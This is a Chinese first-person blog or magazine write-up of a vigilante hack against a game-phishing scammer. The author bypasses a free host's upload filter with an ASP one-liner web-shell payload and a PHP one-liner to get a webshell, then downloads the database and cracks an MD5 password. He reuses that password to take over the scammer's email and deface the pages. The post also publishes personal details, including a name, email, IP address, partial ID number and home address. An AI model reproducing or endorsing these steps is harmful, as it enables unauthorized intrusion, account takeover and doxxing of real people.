社会工程学——骗子,是你耍我还是我耍你? 小帅@[0.S.T]\杭州跟山中学
某天,小菜我在玩梦幻,为了去成都,我可是决定好好的学习了,最后一次的GAME,玩个爽快吧。师门做玩刷官职。然后跑镖一切都很顺利的进行着。突然的一下,某人加了我的帐号然后找我说是某地方能领奖的,呵呵。几岁的小鬼啊。这都骗到爷爷头上来了,我一向狠死骗子的,于是就开始了反骗子之旅。 他一开始让我去http://reg.txt.cn填写资料然后领取东西,一看就知道只是注册了个txt的cn玉米。根本没什么噱头。如图1
(图1)
哈哈,还说自己有500点的点卡。真是XXX,好了,我就开始和他慢慢聊。记得上次买的社会工程学里的(黑手的那个本),介绍说,人的性格分好几种,我看来,骗子属于无所谓,比较耐心的一种,那我就利用这个来和他慢慢聊。如图2
(图2)
我的GAME里的 ID是“龙城之帝”,我就假装不大懂电脑般的聊,为了防止他警惕我而不和我讲话,这样的话就少了信息啦!看看下图,图3
(图3)
破学狂攻之类的武器属性的东西比较贵,要知道,一个就要多少大洋啊,估算着,小菜我得写多少文章啊,我就吹嘘:“刚才300W买了个破血”,我假借游戏里的一个活动:科举要开始了拖延时间,那我那个时间在干什么呢?!当然是在看网站的结构,在一边看和一边交流的过程中,你会发现很多事,比如网站的一些信息可以随时从对方的口中知道,然而对方没料到的是:我,不是,电脑白痴!我们来看下他建站的信息吧: 首先、他选择了个免费空间,用location来实现跳转。达到欺骗的效果。如图4
(图4)
很逼真的东西,还冒充奥运,这类人不应该在这个世界上,在文章最后你会知道我为什么这么说。如图5
(图5)
这个页面相当逼真。不知道的人一定很顺手的写上去了。随便加了个单引号上去提交。对方的页面到了yahoo的某东西上去,貌似是通过xss的urlcode加密的站,弹出个ok的对话框,呵呵,现在这个潜在的外部的xss也被他利用上了,这个现不管,我也和他一起在那个免费空间注册了个账号,用户为xiaoshua,(少了i),然后成功注册后去看管理页面,如图6
(图6)
一看能上传。好,我们开始上传,哪有那么简单就上传上去的啊!当管理是白痴吗?!这个问题困扰了我很久,当上传的东西为一句话或者木马之类的马上提示错误,如图7
(图7)
有那个就不行,我就想了,这个能在线编辑,试着把html换成asp的扩展名,然后写“<script languge=vbscript runnat=server>execute request(“fuckj”)</script>”这样的好处就是避开了asp脚本标记。但是不信的发生了,貌似做了措施,无论怎样,后面的地方总会被系统插入什么的,然后提示就变成了Microsoft VBScript 编译器错误 错误 '800a0408' 无效字符 /User/Free100/xiaoshua/index.asp,行 1 eval%20request%28%22%23%22%29 ----^ 这个不知道怎么。难道就这么放弃了?我才不会,我最最最最最痛恨骗子了!!!想了下,这个空间会不会是全能的呢?支持全部脚本的呢?尝试php失败。最后用php一句话进行在线2次加密才对,其中还爆出了物理路径,呵呵,最后拿到了webshell,如图8
(图8)
不大习惯这个连接端,因为反应比较慢。下载了个angel的spy2008观察之,其实在脑子里就要想好下一步棋怎么样走,我选择了找这个网站的数据库,不知道为什么,总觉对网站检测多了就比较顺手了,找到了conn.asp看到了数据库,如图9
(图9)
,接下来就不需要我多说了,既然他注册了账号,那数据库里肯定有信息啦,但是目录很多,我就开始核对时间,测试时间,我是5月11号注册的,知道他的用户是mhxy,因为大家看我的上传页面的路径里有个xiaoshua,也就是部分路径是按照你的username写的。找到了最新的数据库后就下载下来,然后看user表去了,如图10
(图10)
大家稍微仔细看下就知道,最后个用户“xiaoshua”(小刷)就是我因为少了个i注册的用户,编码11963的mhxy就是“梦幻西游”的缩写了,目标就是他,然后拿出密码开始跑,成功抛出了MD5如图11
(图11)
问了下群里的人,有的人说想电话,看了下他的资料,姓名是:李安。不确定真假,用这个密码去登陆他的cnzz统计,无法登陆,那先算了,其实这个user表里有很多的xy163之类的帐户,因为梦幻西游的官方网站就类似xy3.163之类的,看来可能是团伙作案,呵呵,数据库的作用很大,继续找信息,李安,男,32岁,广东人,邮箱:tyty_XXXX@126.com描述为:梦幻西游,最后登陆IP为:125.90.101.45,为了确认他的资料是否正确,我们只要看下他的IP地址就行了,插了下IP,结果如图12
(图12)
的确是广州茂名市的人,这样电话,前面填写的资料的信任度应该为80%了,E-mail是大家喜欢的东西,因为它能搜到更多的信息,于是开始baidu和google,没搜到任何信息,看来是个不混论坛的人,试着用20151120这个密码进他的邮箱吧,没想到进去了,嗯,看下了下,资料满齐全的,这个人也是个玩梦幻的人,于是我开始更深入的社工他,道理很简单:我讨厌骗子!!结果如图13
(图13)
偶滴娘喂~~这个人真是个坏蛋啊!十足的大坏蛋,男人不是坏蛋,骗子才是坏蛋!各位女同胞们以后别再骂男人了,男人也有尊严……跑题了,这个里面有信,其中有个信里比较有价值的就是, 尊敬的李安您好: 谢谢您在我们这里注册成为我们网站的会员,你的会员 帐号为:261593,会员密码为:XXXX。通过此帐 号和密码就可以登陆你的会员中心,方便快捷的实时开通你 需要的新业务,包括域名、空间、邮局、网站推广等服务。 再次感谢您对我们的支持! 公司:网信科技 - [网通电信-域名注册双线路空间服务器租用] 地址:陕西省咸阳市朝阳五路北口 电话:029-33432627 网址:http://www.oXot.cn/ 呵呵,还注册了个东西的,估计又是什么空间的,下定决心继续挖掘信息。把他邮箱克隆到自己的邮箱然后慢慢看个够。后来又发现了个好东西: 尊敬的 韩永金 你好: 您的将军令已于2007年09月02日 09点33分 被启用, 您填写了如下注册信息: 用户姓名:韩永金 证件类型:身份证 证件号码:440981199010****** 移动电话: 固定电话:066XXXX 电子邮箱:tyty_005@126.com 通信地址:广东茂名市名湖街5XXX号 邮政编码:525200 您的将军令信息如下: 制造日期: 2007年07月24日 03点31分 启用日期:2007年09月02日 09点33分 过期日期:2010年07月24日 00点00分 当前状态:正常 状态改变时间:2007年09月02日 09点33分 祝您使用愉快! 网易将军令客户服务中心 2007年09月02日 09点33分 仔细看下,韩永金这个名字肯定是韩国的,因为推行了防沉迷的系统,所以随便找个身份证就行,他的名字叫李安。固定电话什么的可以申诉,于是就跑去163了。可惜申诉不到。这个时候我想到了电话,电话如果……能把来电显示换成北京网监的就好了,我记得黑手的社工书上有个叫秦力的人知道怎么破解。小菜我不会。听说那东西580快一个,我比较穷。就不忽悠那个人了,上Game在游戏里一贴,XX是骗子证据XX.ok,我的责任完了。然后把他的骗子页面全部改个版本。小帅的版本,如图14
(图14)
要是我有那个500多快的东西就好了。文章写玩了。骗子应该没人会去相信了。站点也搞清楚了。他的密码还在我手里。因为我要上学的,也没那么长的时间来监视他的行动。领会精神领会精神就行
下载附件
|